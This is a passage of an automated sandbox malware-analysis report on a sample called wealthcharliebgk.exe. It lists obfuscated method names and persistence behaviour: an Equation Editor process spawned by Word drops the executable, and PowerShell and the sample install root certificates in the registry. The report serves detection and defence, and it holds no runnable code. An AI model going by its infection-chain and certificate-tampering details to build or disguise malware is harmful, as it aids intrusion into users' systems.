                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, SOXwYAP7vdNCyO3A7D.csHigh entropy of concatenated method names: 'ToString', 'baJVpJoEEC', 'I9vVJYfUZG', 'a7JVv67pRX', 'tlsVUPnCxn', 'aIFVTUuMmy', 'OrqVbE6poL', 'l0lV3OicBq', 'StvVgaN46C', 's6SVucoMT5'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, V2NTuI83GISjPPYVRb.csHigh entropy of concatenated method names: 'wkKGoXUfR7', 'vEsGf4uaQZ', 'kBaGPKPhIi', 'FMJGNNvqAt', 'CTIGDIxCOT', 'mhFGKWCMVT', 'WO7GLxMHYm', 'ReyGaef89L', 'H8wGnUDbi1', 'MDcG5tP4I1'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, o0MILsOOnm1U2ieJdGx.csHigh entropy of concatenated method names: 'QdbQ5s1mts', 'QyyQzWTAoJ', 'R6ixI1gxUi', 'I0FxOrcUBS', 'nYRx0DpA78', 'dnjxrVx2eS', 'foAxR2HKeQ', 'uDrx67sd5j', 'Q8Xxm8BSLp', 'JHTxGVN4X1'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, kbVRJyGEL5y0oi0u8w.csHigh entropy of concatenated method names: 'Dispose', 'EjtOnl9RMx', 'vP60JIVl9g', 'rOt7xETrkB', 'tvGO5de5BG', 'hWLOzgT60A', 'ProcessDialogKey', 'dNa0ISgky6', 'XpD0OcSfTs', 'su000chtdn'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, iEcxvpukSVQdOZVxAA.csHigh entropy of concatenated method names: 'RN2scPBQFq', 'eM5shKHXuF', 'X9KsMyFKme', 'nL9s7faCD4', 'zeisBSNJy6', 'o1qsZoI3C6', 'U03sHxpkDJ', 'PqFs85yP5j', 'tWpsSq0C2w', 'J0EsegtLv6'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, fFrPugOIr6F0NahewZZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XdfQphMnRo', 'MRZQCTAgFF', 'dMGQ2E6Mba', 'pl7Qo2aDTy', 'xoCQfV29SZ', 'kWYQPDwvJg', 'UBNQNLtAqi'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, n86m6g2LgDMLIrOLOh.csHigh entropy of concatenated method names: 'f7EE8N1cOP', 'FpQESTZv1K', 'uuGEwnarWt', 'ko3EJKQ1tf', 'WvrEUuU4T5', 'ypQETc6Pl4', 'AKhE3f6be7', 'V2dEgfhQfA', 'YL3EiYUCsy', 'e83EprmSLM'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, xhtdn452GTCfESQUGv.csHigh entropy of concatenated method names: 'lkiQd1Xkri', 'VEgQXI9r85', 'cXfQqx04c7', 'yFGQsw3kv2', 'udDQWuKX1v', 'zbhQFoDpJg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, TU4Cp2RapkVHJaYXP6.csHigh entropy of concatenated method names: 'zgKOs2NTuI', 'LGIOFSjPPY', 'pC5Ol696Jm', 'BYrOt5RtKe', 'cvBOYLAytJ', 'TlJOV8vFTN', 'I7d8pqh1OZGV8T3qdK', 'gX4As9voPdmYplVuRU', 'DYdOOAv81g', 'GH2OroUQjF'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, x0XCxBoZ0VvJ6ROlJR.csHigh entropy of concatenated method names: 'FDLYic61K5', 'OqWYCvCTIi', 'o52Yokwbn9', 'p0gYfnpOcS', 'HuLYJC5sV6', 'OV4YvU0nog', 'ycFYUqtDbq', 'mcfYTvtspX', 'aRQYbwbibW', 'lWXY3cgWq7'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.csHigh entropy of concatenated method names: 'KkXr6PqgUP', 'uWlrmpWI4Y', 'zOfrGtBSw8', 'PtxrdGKTEl', 'xjCrXvi4tS', 'FCJrqMPWkd', 'Gr8rsi8rwj', 'SJ9rFciKUM', 'Gmsrj7OMXY', 'MhRrl9ZF2P'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, BP8YSHNXVPporwPd4V.csHigh entropy of concatenated method names: 'YDXAl3x7YT', 'iyeAta3eQA', 'ToString', 'tx9AmoO0NS', 'nb1AGyyQ1J', 'IL8Ade4jQU', 'mLLAXcJYX6', 'gMdAqX7kWu', 'YcEAsLrEaK', 'CLkAF4kNDN'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, bn4TrYUsuwJQmmd254.csHigh entropy of concatenated method names: 'f1FqkDxIpc', 'M5lqcHc3Ou', 'gN6qMm0NJB', 'wpbq7p2ANO', 'E8uqZy52ZE', 'e2JqHYryTV', 'dfcqS21inh', 'xmaqePjGOF', 'XUBmOq9V2yow1pTjInZ', 'iDcE4D9W4EnuZxQvFBj'
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, iAfNRMLCf8jtl9RMxx.csHigh entropy of concatenated method names: 'bxNWYgM37c', 'piNWAVXo4u', 'trWWWsW8B9', 'EG6WxZgVnF', 'QRlW91P18c', 'UcrWkmDSvr', 'Dispose', 'Jfq4mccBRP', 'YRj4GviwBp', 'nDu4dpOipT'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, dtKeGNeVNY8RE0vBLA.csHigh entropy of concatenated method names: 'NCCXBDr1Lk', 'GsaXHlCImj', 'jgsdv2ZobI', 'WLTdU9tW1B', 'fDIdTE5vCY', 'BVGdbDMEE5', 'TIld38ILKS', 'ffMdglfbo9', 'SNedudLgmD', 'it8dismJma'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, PALlVQORW7VbmF9ELo2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QfYyW0OLg1', 'islyQJWCQZ', 'UYoyxjv3Dk', 'tbkyykd0lb', 'M4Ry9G0X04', 'OUCy1JQtVc', 'nCSykwpQ38'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, shKIYL39keTC3Y0mTs.csHigh entropy of concatenated method names: 'vNusmGijIA', 'SQGsd51ABP', 'YsYsqv1A2r', 'lcsq5y7Dtk', 'gTIqz7GxQy', 'lmssI8i491', 'TZAsOFIYq5', 'M5Ms0KkVQN', 'x9esrBqSlK', 'XZCsRtwWyF'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, Y9KY4VzA2jSZGjyJ6P.csHigh entropy of concatenated method names: 'y9CQZPUJN5', 'mWEQ8sUZTp', 'vZQQSGeFPa', 'z5cQwsiy1k', 'RhnQJheFej', 'mkAQUeygpt', 'OM0QTxq1Uj', 'pn0QkBOwXe', 'pcvQcm3BpI', 'CZSQhd0fKJ'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, nkHJY90Brlbmc3kJEC.csHigh entropy of concatenated method names: 'uM4MuIw1K', 'Wlw7U6puD', 'Cd2ZGtAuR', 'pA6H8yZi7', 'kRCS4Fp9c', 'KQpeB3clT', 'lNCgVNQY0iNENvl7vo', 'cyAvS1ypWUKRpjvLYc', 'Tt944IDf6', 'PnXQbbPMZ'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, utJNlJw8vFTN1VgkyR.csHigh entropy of concatenated method names: 'qc3q636cx2', 'n6lqGhk3xk', 'gJqqXYJilr', 'd8WqsxT8Pj', 'C96qFmwF3n', 'fwbXDs2pJu', 'LXYXKcMK2K', 'g11XLbuL4u', 'G5mXaoQSxa', 'HXwXnETDi1'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, SAoJvXKICZmdm4r4AF.csHigh entropy of concatenated method names: 'hpZAadklxE', 'tmyA5WIdBu', 'FxE4Irmj2k', 'JQ54Ol3ve2', 'ut2ApfZukn', 'jdHACKnD4U', 'BPUA26Ibxt', 's0hAoB7TTo', 'YhhAfDlpYG', 'zywAPMG304'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, wSOUBVSC5696JmBYr5.csHigh entropy of concatenated method names: 'FI1d7urVHJ', 'GkydZoYHEx', 'eGJd8J1Yi9', 'cCKdSAmoCe', 'bIddYd4Amr', 'fLtdVoPq5M', 'cuEdAETcaj', 'Mppd4IVTUU', 'VBUdWICpEO', 'FKpdQVC7K9'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, WSgky6napDcSfTsQu0.csHigh entropy of concatenated method names: 'DhXWwuDBl2', 'nosWJoT5O5', 'tYxWvBn50b', 'DWMWUucuyH', 'Ux6WTrfE4I', 'Eb2WbxEK5G', 'YeVW3g1lGx', 'FvfWgyXV2B', 'pBDWuaMmFk', 'juPWiUyi0f'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, Q8MD4kJhk2Qpfin5Ab.csHigh entropy of concatenated method names: 'Bameic9GA5CM8L0sFxU', 'lLPrdM9Ffwvo6O2x5c0', 'MkOq4XVPt7', 'CSUqWSRqOp', 'QJMqQdX5l3', 'K6yd3e9g2bn1Et02Mx3', 'YUiMVB9mpDrg1H7Eryh'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, SOXwYAP7vdNCyO3A7D.csHigh entropy of concatenated method names: 'ToString', 'baJVpJoEEC', 'I9vVJYfUZG', 'a7JVv67pRX', 'tlsVUPnCxn', 'aIFVTUuMmy', 'OrqVbE6poL', 'l0lV3OicBq', 'StvVgaN46C', 's6SVucoMT5'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, V2NTuI83GISjPPYVRb.csHigh entropy of concatenated method names: 'wkKGoXUfR7', 'vEsGf4uaQZ', 'kBaGPKPhIi', 'FMJGNNvqAt', 'CTIGDIxCOT', 'mhFGKWCMVT', 'WO7GLxMHYm', 'ReyGaef89L', 'H8wGnUDbi1', 'MDcG5tP4I1'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, o0MILsOOnm1U2ieJdGx.csHigh entropy of concatenated method names: 'QdbQ5s1mts', 'QyyQzWTAoJ', 'R6ixI1gxUi', 'I0FxOrcUBS', 'nYRx0DpA78', 'dnjxrVx2eS', 'foAxR2HKeQ', 'uDrx67sd5j', 'Q8Xxm8BSLp', 'JHTxGVN4X1'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, kbVRJyGEL5y0oi0u8w.csHigh entropy of concatenated method names: 'Dispose', 'EjtOnl9RMx', 'vP60JIVl9g', 'rOt7xETrkB', 'tvGO5de5BG', 'hWLOzgT60A', 'ProcessDialogKey', 'dNa0ISgky6', 'XpD0OcSfTs', 'su000chtdn'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, iEcxvpukSVQdOZVxAA.csHigh entropy of concatenated method names: 'RN2scPBQFq', 'eM5shKHXuF', 'X9KsMyFKme', 'nL9s7faCD4', 'zeisBSNJy6', 'o1qsZoI3C6', 'U03sHxpkDJ', 'PqFs85yP5j', 'tWpsSq0C2w', 'J0EsegtLv6'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, fFrPugOIr6F0NahewZZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XdfQphMnRo', 'MRZQCTAgFF', 'dMGQ2E6Mba', 'pl7Qo2aDTy', 'xoCQfV29SZ', 'kWYQPDwvJg', 'UBNQNLtAqi'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, n86m6g2LgDMLIrOLOh.csHigh entropy of concatenated method names: 'f7EE8N1cOP', 'FpQESTZv1K', 'uuGEwnarWt', 'ko3EJKQ1tf', 'WvrEUuU4T5', 'ypQETc6Pl4', 'AKhE3f6be7', 'V2dEgfhQfA', 'YL3EiYUCsy', 'e83EprmSLM'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, xhtdn452GTCfESQUGv.csHigh entropy of concatenated method names: 'lkiQd1Xkri', 'VEgQXI9r85', 'cXfQqx04c7', 'yFGQsw3kv2', 'udDQWuKX1v', 'zbhQFoDpJg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, TU4Cp2RapkVHJaYXP6.csHigh entropy of concatenated method names: 'zgKOs2NTuI', 'LGIOFSjPPY', 'pC5Ol696Jm', 'BYrOt5RtKe', 'cvBOYLAytJ', 'TlJOV8vFTN', 'I7d8pqh1OZGV8T3qdK', 'gX4As9voPdmYplVuRU', 'DYdOOAv81g', 'GH2OroUQjF'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, x0XCxBoZ0VvJ6ROlJR.csHigh entropy of concatenated method names: 'FDLYic61K5', 'OqWYCvCTIi', 'o52Yokwbn9', 'p0gYfnpOcS', 'HuLYJC5sV6', 'OV4YvU0nog', 'ycFYUqtDbq', 'mcfYTvtspX', 'aRQYbwbibW', 'lWXY3cgWq7'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.csHigh entropy of concatenated method names: 'KkXr6PqgUP', 'uWlrmpWI4Y', 'zOfrGtBSw8', 'PtxrdGKTEl', 'xjCrXvi4tS', 'FCJrqMPWkd', 'Gr8rsi8rwj', 'SJ9rFciKUM', 'Gmsrj7OMXY', 'MhRrl9ZF2P'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, BP8YSHNXVPporwPd4V.csHigh entropy of concatenated method names: 'YDXAl3x7YT', 'iyeAta3eQA', 'ToString', 'tx9AmoO0NS', 'nb1AGyyQ1J', 'IL8Ade4jQU', 'mLLAXcJYX6', 'gMdAqX7kWu', 'YcEAsLrEaK', 'CLkAF4kNDN'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, bn4TrYUsuwJQmmd254.csHigh entropy of concatenated method names: 'f1FqkDxIpc', 'M5lqcHc3Ou', 'gN6qMm0NJB', 'wpbq7p2ANO', 'E8uqZy52ZE', 'e2JqHYryTV', 'dfcqS21inh', 'xmaqePjGOF', 'XUBmOq9V2yow1pTjInZ', 'iDcE4D9W4EnuZxQvFBj'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, iAfNRMLCf8jtl9RMxx.csHigh entropy of concatenated method names: 'bxNWYgM37c', 'piNWAVXo4u', 'trWWWsW8B9', 'EG6WxZgVnF', 'QRlW91P18c', 'UcrWkmDSvr', 'Dispose', 'Jfq4mccBRP', 'YRj4GviwBp', 'nDu4dpOipT'

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
